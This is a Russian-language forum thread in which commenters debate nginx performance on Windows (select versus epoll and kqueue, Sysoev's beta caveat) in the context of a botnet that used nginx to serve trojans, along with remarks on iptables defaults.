>Почему не справляется? Под windows nginx какой-то другой?В nginx можно указать разные методы обработки соединений:
http://sysoev.ru/nginx/docs/events.htmlselect и poll - стандартные.
Остальные (kqueue, epoll, rt signals, event ports) - более быстрые.
По сути, они и создавались для того, чтобы использовать что-то более быстрое, чем select.Так вот.
В windows только и есть, что select.
Сам Сысоев пишет, что особой производительности ждать не стоит:
http://sysoev.ru/nginx/docs/windows.htmlДругими словами - мощь современных способов обработки соединений в nginx просто недоступна в Windows.
Но представители Microsoft все равно гордо заявляли, что "теперь nginx доступен и под Windows, что позволяет строить высокопроиводительные серверы и на этой платформе!" =)
не перекручивай.
как бы там ни было, написано, что _пока_ высокой производительности ждать не стоит
>не перекручивай.
>как бы там ни было, написано, что _пока_ высокой производительности ждать не
>стоитКороче полностью цитата:
"В качестве метода обработки соединений используется select, поэтому не стоит ожидать высокой производительности и масштабируемости: пока это бета-версия."Ну а если по теме, то select остается select'ом.
Если Сысоев добьется стабильности и масштабирования, то респект ему.
Если он сможет ещё и что-то придумать с производительностью, то респект ему вдвойне.
Ведь когда разработчики системы сами кладут на производительность, то чтобы добиваться быстродействия - это надо быть мастером)
>Почему не справляется? Под windows nginx какой-то другой?под виндой ядро и tcp «какие-то другие».
>>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
>>не поднимают по простой причине - винда не справляется с нагрузкой
>>)))
>
>Почему не справляется? Под windows nginx какой-то другой?Да кстати, как тут заметили ниже, под windows TCP/IP стек тоже веселый.
Я бы сказал, кастрированный)
>>>Прочитал споры о виндовс/линух, имею смелость предположить, что на виндах этот ботнет
>>>не поднимают по простой причине - винда не справляется с нагрузкой
>>>)))
>>
>>Почему не справляется? Под windows nginx какой-то другой?
>
>Да кстати, как тут заметили ниже, под windows TCP/IP стек тоже веселый.
>
>Я бы сказал, кастрированный)Тут налицо маленькое непонимание. Нет никакой супернагрузки! Когда звучит слово 'nginx', мы считаем, что идёт речь о тысячах запросов, но это не так. В данном ботнете nginx использовался просто как стандартный быстрый web сервер, который везде есть и который не надо подгружать извне, можно использовать готовый. Он выбран не из-за скоростных характеристик. Конечно, он быстрый и это хорошо, но он очень избыточен для задач раздачи троянцев - троянец маленький и может быть втиснут в несколько пакетов по полтора килобайта и отдавать его можно очень быстро и без nginx, и почти без tcpip - для пары пакетов tcpip можно считать аналогом udp с хорошим приближением.
Да, кстати. Насчёт "на виндах этот ботнет не поднимают по простой причине - винда не справляется с нагрузкой" - может никто не заметил, но ботнеты, как правило, работают именно на виндах и с нагрузкой она справляется великолепно.
>а по умолчанию iptables работает почти вездеПо _умолчанию_ не работает почти нигде.
>>а по умолчанию iptables работает почти везде
>По _умолчанию_ не работает почти нигде.работает. но не настроен. с точки зрения юзера, правда, разницы нет. %-)